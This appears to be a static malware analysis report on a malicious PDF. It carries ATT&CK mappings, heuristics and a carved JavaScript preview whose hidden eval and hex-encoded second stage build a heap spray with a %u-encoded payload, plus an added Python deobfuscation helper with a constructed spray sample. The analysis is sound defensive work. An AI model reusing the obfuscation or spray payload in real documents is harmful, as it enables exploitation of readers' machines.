Malicious PDF — malware analysis report

Static analysis result for SHA-256 736c5fc4ae073e1d…

Verdict: MALICIOUS
File type: PDF
Size: 45.5 KB
MD5: 6abe18e364877765049357f933afdfc5
SHA-1: 9b1bef4876487367c14491ddf425266f2a5b3ddc
SHA-256: 736c5fc4ae073e1dff212044a9b374d62cce6a7db9af8990bfec5781baa48a3a
Risk score: 126

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The PDF contains embedded JavaScript (PDF_JAVASCRIPT and PDF_JS heuristics) and is flagged by the critical PDF JavaScript exploit cluster. The carved script hides its eval call by building the string "eval" from a space-padded literal passed to new Function (so a plain search for "eval" finds nothing), and carries a long hexadecimal string literal. That literal decodes to a second JavaScript stage: it aliases unescape, assembles a %u-encoded payload, builds a 0x0c0c filler from single-character pieces so that "%u0c0c" never appears as one token, and grows the combined string into 0x80000-character blocks, which is the shape of a heap spray. Together with the XFA form content and the use of String.fromCharCode, this is a PDF built to exploit a reader vulnerability and execute arbitrary code; no specific CVE is attributed by the static analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (6)

  • JavaScript action (low; 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream (low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form (low) PDF_XFA
    PDF uses XML Forms Architecture, which can contain script logic.
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.bitstream.com (in PDF document text)
    • http://ns.adobe.com/xdp/ (in PDF document text)
    • http://www.xfa.org/schema/xci/2.6/ (in PDF document text)
    • http://www.xfa.org/schema/xfa-template/2.6/ (in PDF document text)
    The ns.adobe.com and xfa.org entries are XML namespace identifiers from the XFA template, not network destinations. www.bitstream.com is a font vendor's address and most likely comes from the embedded font's metadata. Nothing in the visible script uses any of these URLs as a download or callback location.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0012_000.js
SHA-256: 429b94f5ec39f0ba40fa9540b05aa7a7bb130c6a302526277be060d720110389
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0xA0B3
Size: 4508 bytes
Detection
ClamAV: No threats found (a signature miss only; the verdict rests on the heuristics above and on the carved script itself)
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s) and 1 long base64-like blob(s). The blob is the hexadecimal string literal visible in the preview; hex digits are a subset of the base64 alphabet, which is why the generic check fires.
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev       a     l        (a);".split(" ").join(""));
       var s='207661722046486b6554203d20756e6573636170653b20766172204e6341697550203d2046486b655428202225753431343125753431343125753633613525753461383025753030303025753461386125753231393625753461383025753166393025753461383025753930336325753461383425756236393225753461383025753130363425753461383025753232633825753461383525753030303025753130303025753030303025753030303025753030303025753030303025753030303225753030303025753031303225753030303025753030303025753030303025753633613525753461383025753130363425753461383025753264623225753461383425753261623125753461383025753030303825753030303025756138613625753461383025753166393025753461383025753930333825753461383425756236393225753461383025753130363425753461383025756666666625756666666625753030303025753030303025753030343025753030303025753030303025753030303025753030303025753030303125753030303025753030303025753633613525753461383025753130363425753461383025753264623225753461383425753261623125753461383025753030303825753030303025756138613625753461383025753166393025753461383025753930333025753461383425756236393225753461383025753130363425753461383025756666666625756666666625753030323225753030303025753030303025753030303025753030303025753030303025753030303025753030303125753633613525753461383025753030303425753461386125753231393625753461383025753633613525753461383025753130363425753461383025753264623225753461383425753261623125753461383025753030333025753030303025756138613625753461383025753166393025753461383025753030303425753461386125756137643825753461383025753633613525753461383025753130363425753461383025753264623225753461383425753261623125753461383025753030323025753030303025756138613625753461383025753633613525753461383025753130363425753461383025756165646325753461383025753166393025753461383025753030333425753030303025756435383525753461383025753633613525753461383025753130363425753461383025753264623225753461383425753261623125753461383025753030306125753030303025756138613625753461383025753166393025753461383025753931373025753461383425756236393225753461383025
75666666662575666666662575666666662575666666662575666666662575666666662575313030302575303030302575633164612575643462612575326464642575643939362575323437342575356566342575633933312575333362312575353633312575383331372575303463362575383230332575636663652575643636332575383631392575323638632575663964612575633330352575326265622575383037312575666335652575633466312575373735322575666335372575663565312575663337302575623334322575336161362575373535322575393036372575313739302575656131622575663763342575323532322575663931392575356236332575616264322575313033632575356334312575363434382575356435612575653339652575323565322575333339622575396639362575363361322575616230372575396265642575663332332575396163642575653765302575643533322575646338642575653463312575326434372575643732392575653261372575643831342575666132352575646535312575383964352575316461392575386136622575356336392575316662372575633636632575383733632575663735342575356539312575666231652575313435652575316637382575663936302575316266322575666365392575616164342575646161392575663766302575343236612575356461302575376264632575333962322575643938312575616262382575353864362575613165332575653832392575386339392575663232612575626561312575633334322575353132612575646331342575313666382575393665612575336561312575376636332575303333302575383065652575343765652575303331372575333731622575316265632575333236652575396261382575346538322575343961312575666461352575356263322575363063362575303735312575303732372575613264312575343133372220293b2076617220497355203d2046486b65542820222522202b20227522202b20223022202b20226322202b20223022202b20226322202b2022257522202b20223022202b20226322202b20223022202b2022632220293b207768696c6520284973552e6c656e677468202b203230202b2038203c20363535333629204973552b3d4973553b204271203d204973552e737562737472696e6728302c20283078306330632d30783234292f32293b204271202b3d204e63416975503b204271202b3d204973553b20664d7766203d2042712e737562737472696e6728302c2036353533362f32293b207768696c6528664d77662e6c656e677468203c20307838303030302920664d7766202b
3d20664d77663b2050
... (truncated)
Filename: font_00_sfnt_off0000033c.bin
SHA-256: 809d6a5a649de916f6b34cae6ee7d676e4ffb08967d9f9947dc2e3ae38a2157c
Kind: pdf-font-stream
Source: PDF embedded font (sfnt) at offset 0x33C
Size: 65932 bytes
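As an added example (not code from this report or from the analysis platform that produced it), the following Python triage helper reproduces the deobfuscation steps the Malware Insights summary describes for the carved script: it flags the split/join-built eval that a plain token search misses, decodes the long hexadecimal literal into the second stage, and converts the %u-encoded payload into the little-endian bytes a heap spray places in memory. The sample script embedded in it is constructed for the example: the second stage mirrors only the opening statements the report's hex string decodes to, and the hex-decoding for-loop stands in for the truncated part of the preview script; the variable names FHkeT, NcAiuP, IsU, Bq and fMwf are taken from that decoded text.

```python
"""Triage helper for obfuscated PDF JavaScript shaped like the preview script above.

Added example; not code from the report or from the platform that produced it.
Assumptions: stage 1 rebuilds "eval" from a space-padded literal fed to new Function
and carries stage 2 as one long hex string literal; stage 2 keeps its payload in
unescape("%uXXXX...") form. The sample below is constructed for this example.
"""
import re

STRING_LITERAL = re.compile(r"'([^'\\]*(?:\\.[^'\\]*)*)'|\"([^\"\\]*(?:\\.[^\"\\]*)*)\"")
HEX_LITERAL = re.compile(r"'([0-9a-fA-F]{64,})'|\"([0-9a-fA-F]{64,})\"")
U_ESCAPE_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4}){4,}")
STAGING_TOKENS = ("eval", "unescape", "fromCharCode", "new Function", "split(", "join(")


def count_staging_tokens(js):
    """Naive token counts; a split/join-built eval scores zero here on purpose."""
    return {t: js.count(t) for t in STAGING_TOKENS if t in js}


def hidden_eval_literals(js):
    """String literals that spell 'eval' only once whitespace is stripped,
    i.e. the 'ev       a     l' trick that hides eval from token matching."""
    hits = []
    for m in STRING_LITERAL.finditer(js):
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if "eval" not in lit and "eval" in re.sub(r"\s+", "", lit):
            hits.append(lit)
    return hits


def decode_hex_stages(js):
    """Decode every long hex string literal that yields ASCII text (a next stage)."""
    stages = []
    for m in HEX_LITERAL.finditer(js):
        hexstr = m.group(1) or m.group(2)
        if len(hexstr) % 2:
            continue
        try:
            stages.append(bytes.fromhex(hexstr).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return stages


def unescape_u_bytes(run):
    """Bytes a %uXXXX run occupies once unescape() has turned it into a JS string.
    Each %uXXXX is a UTF-16 code unit stored little-endian, so %u63a5%u4a80 becomes
    a5 63 80 4a, i.e. the dword 0x4a8063a5 that a spray chain wants in memory."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", run):
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)


def dwords_le(payload):
    """Little-endian 32-bit view of a payload, the way a sprayed chain is read."""
    return [int.from_bytes(payload[i:i + 4], "little") for i in range(0, len(payload) - 3, 4)]


def triage(js):
    """Peel stage 1, decode stage 2, and pull the %u-encoded payload out of it."""
    report = {
        "hidden_eval": hidden_eval_literals(js),
        "stage1_tokens": count_staging_tokens(js),
        "stages": [],
    }
    for stage in decode_hex_stages(js):
        payloads = [unescape_u_bytes(m.group(0)) for m in U_ESCAPE_RUN.finditer(stage)]
        report["stages"].append({
            "tokens": count_staging_tokens(stage),
            "payload_dwords": [dwords_le(p) for p in payloads],
        })
    return report


# Constructed stage 2, mirroring the opening statements the report's hex literal
# decodes to: alias unescape, a %u-encoded blob, a 0x0c0c filler assembled piecewise
# so "%u0c0c" never appears as one token, then block growth to 0x80000 characters.
STAGE2 = (
    'var FHkeT = unescape; var NcAiuP = FHkeT("%u4141%u4141%u63a5%u4a80%u0000%u4a8a"); '
    'var IsU = FHkeT("%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c"); '
    "while (IsU.length + 20 + 8 < 65536) IsU+=IsU; "
    "Bq = IsU.substring(0, (0x0c0c-0x24)/2); Bq += NcAiuP; Bq += IsU; "
    "fMwf = Bq.substring(0, 65536/2); while(fMwf.length < 0x80000) fMwf += fMwf;"
)
EVAL_LITERAL = "ev       a     l        (a);"
# Constructed stage 1 in the shape of the preview script; the decode loop is assumed.
SAMPLE_JS = (
    'var eva=new Function("a","' + EVAL_LITERAL + '".split(" ").join(""));\n'
    "var s='" + STAGE2.encode("ascii").hex() + "';\n"
    "var d=''; for(var i=0;i<s.length;i+=2) d+=String.fromCharCode(parseInt(s.substr(i,2),16));\n"
    "eva(d);\n"
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_JS), indent=2))
```

Run it and compare the recovered dwords with the %u pairs in the decoded text: the first two units collapse to 0x41414141 (filler) and the next pair to 0x4a8063a5, which is how a spray chain's addresses are packed. The piecewise "%" + "u" + "0" + "c" construction is why a signature for the literal "%u0c0c" misses this sample, and why the rule set above scores correlated staging indicators rather than any single token.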